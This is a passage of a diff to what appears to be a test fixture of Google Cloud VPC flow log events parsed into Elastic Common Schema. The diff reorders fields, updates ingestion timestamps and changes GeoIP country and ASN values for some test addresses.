"{\"insertId\":\"19im82tfdygznw\",\"jsonPayload\":{\"bytes_sent\":\"175465\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":53106,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.401543207Z\",\"packets_sent\":\"337\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.020290305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.020290305Z", @@ -19863,43 +20810,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Boardman", - "region_name": "Oregon" - }, - "as": { - "number": 16509 - }, - "address": "67.43.156.13", - "port": 9243, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.49.136.133", - "port": 52780, - "bytes": 1987804, - "packets": 26428, - "domain": "simianhacker-demo", - "ip": "10.49.136.133" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:iY4jL+9QMjdSzot4PM7XduwgWhY=", - "bytes": 1987804, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 26428, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:17.553Z", "ecs": { "version": "1.12.0" @@ -19910,6 +20820,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -19930,8 +20843,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 9243, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.49.136.133", + "port": 52780, + "bytes": 1987804, + "packets": 26428, + "domain": "simianhacker-demo", + "ip": "10.49.136.133" + }, "event": { - "ingested": "2021-12-09T13:37:46.392280900Z", + "ingested": "2021-12-14T14:43:27.415277781Z", "original": "{\"insertId\":\"19im82tfdygzo2\",\"jsonPayload\":{\"bytes_sent\":\"1987804\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":9243,\"protocol\":6,\"src_ip\":\"10.49.136.133\",\"src_port\":52780},\"dest_location\":{\"asn\":16509,\"city\":\"Boardman\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Oregon\"},\"end_time\":\"2019-06-14T03:49:58.592579489Z\",\"packets_sent\":\"26428\",\"reporter\":\"SRC\",\"rtt_msec\":\"91\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:17.183499423Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:17.183499423Z", @@ -19939,6 +20877,18 @@ "id": "19im82tfdygzo2", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:iY4jL+9QMjdSzot4PM7XduwgWhY=", + "bytes": 1987804, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 26428, + "direction": "outbound" } }, { @@ -19953,11 +20903,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -20029,7 +20984,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392285Z", + "ingested": "2021-12-14T14:43:27.415278175Z", "original": "{\"insertId\":\"19im82tfdygzn9\",\"jsonPayload\":{\"bytes_sent\":\"206824\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33532,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"242\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072372604Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.072372604Z", @@ -20051,11 +21006,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -20127,7 +21087,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392288400Z", + "ingested": "2021-12-14T14:43:27.415278562Z", "original": "{\"insertId\":\"19im82tfdygznh\",\"jsonPayload\":{\"bytes_sent\":\"14287\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33858,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"80\",\"reporter\":\"DEST\",\"rtt_msec\":\"4\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.458361534Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.458361534Z", @@ -20149,11 +21109,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33550, @@ -20225,7 +21190,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392292700Z", + "ingested": "2021-12-14T14:43:27.415278955Z", "original": "{\"insertId\":\"19im82tfdygzny\",\"jsonPayload\":{\"bytes_sent\":\"59376\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33550},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108649Z\",\"packets_sent\":\"354\",\"reporter\":\"DEST\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.496238286Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.496238286Z", @@ -20247,11 +21212,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33568, @@ -20323,7 +21293,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392298500Z", + "ingested": "2021-12-14T14:43:27.415279401Z", "original": "{\"insertId\":\"19im82tfdygzoe\",\"jsonPayload\":{\"bytes_sent\":\"11214\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33568},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789035952Z\",\"packets_sent\":\"120\",\"reporter\":\"DEST\",\"rtt_msec\":\"506\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.456732113Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.456732113Z", @@ -20345,11 +21315,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 53106, @@ -20421,7 +21396,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392304100Z", + "ingested": "2021-12-14T14:43:27.415279838Z", "original": "{\"insertId\":\"19im82tfdygznn\",\"jsonPayload\":{\"bytes_sent\":\"1763338\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":53106},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.401543207Z\",\"packets_sent\":\"598\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.020290305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.020290305Z", @@ -20437,11 +21412,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -20519,7 +21499,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392309600Z", + "ingested": "2021-12-14T14:43:27.415280346Z", "original": "{\"insertId\":\"19im82tfdygznl\",\"jsonPayload\":{\"bytes_sent\":\"67239\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33590},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"363\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.146956782Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.146956782Z", @@ -20541,11 +21521,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -20617,7 +21602,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392315200Z", + "ingested": "2021-12-14T14:43:27.415280736Z", "original": "{\"insertId\":\"19im82tfdygznv\",\"jsonPayload\":{\"bytes_sent\":\"250327\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33558,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"247\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140109489Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140109489Z", @@ -20628,9 +21613,36 @@ } }, { + "@timestamp": "2019-06-14T03:50:17.553Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.2.12", + "10.73.186.17" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST" + } + }, "destination": { "address": "10.73.186.17", "port": 22, @@ -20653,6 +21665,16 @@ "ip": "192.168.2.12", "packets": 2 }, + "event": { + "ingested": "2021-12-14T14:43:27.415281124Z", + "original": "{\"insertId\":\"19im82tfdygzoc\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.73.186.17\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.168.2.12\",\"src_port\":44128},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:22.318564382Z\",\"packets_sent\":\"2\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":4837,\"city\":\"Binzhou\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Shandong\"},\"start_time\":\"2019-06-14T03:45:22.080963433Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "kind": "event", + "start": "2019-06-14T03:45:22.080963433Z", + "end": "2019-06-14T03:45:22.318564382Z", + "id": "19im82tfdygzoc", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -20664,43 +21686,6 @@ "iana_number": "6", "packets": 2, "direction": "inbound" - }, - "@timestamp": "2019-06-14T03:50:17.553Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.2.12", - "10.73.186.17" - ] - }, - "gcp": { - "destination": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - }, - "vpcflow": { - "reporter": "DEST" - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.392319600Z", - "original": "{\"insertId\":\"19im82tfdygzoc\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.73.186.17\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.168.2.12\",\"src_port\":44128},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:22.318564382Z\",\"packets_sent\":\"2\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":4837,\"city\":\"Binzhou\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Shandong\"},\"start_time\":\"2019-06-14T03:45:22.080963433Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", - "kind": "event", - "start": "2019-06-14T03:45:22.080963433Z", - "end": "2019-06-14T03:45:22.318564382Z", - "id": "19im82tfdygzoc", - "category": "network", - "type": "connection" } }, { @@ -20709,11 +21694,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33542, @@ -20791,7 +21781,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392324300Z", + "ingested": "2021-12-14T14:43:27.415281592Z", "original": "{\"insertId\":\"19im82tfdygzof\",\"jsonPayload\":{\"bytes_sent\":\"266531\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33542,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"253\",\"reporter\":\"SRC\",\"rtt_msec\":\"173\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150870105Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150870105Z", @@ -20813,11 +21803,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33560, @@ -20889,7 +21884,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392330Z", + "ingested": "2021-12-14T14:43:27.415281980Z", "original": "{\"insertId\":\"19im82tfdygznr\",\"jsonPayload\":{\"bytes_sent\":\"65184\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33560},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565026127Z\",\"packets_sent\":\"358\",\"reporter\":\"DEST\",\"rtt_msec\":\"116\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.076060079Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.076060079Z", @@ -20911,11 +21906,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33564, @@ -20987,7 +21987,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392335500Z", + "ingested": "2021-12-14T14:43:27.415282488Z", "original": "{\"insertId\":\"19im82tfdygznx\",\"jsonPayload\":{\"bytes_sent\":\"319459\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33564},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597079770Z\",\"packets_sent\":\"180\",\"reporter\":\"DEST\",\"rtt_msec\":\"340\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866944869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.866944869Z", @@ -21085,7 +22085,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392341Z", + "ingested": "2021-12-14T14:43:27.415282939Z", "original": 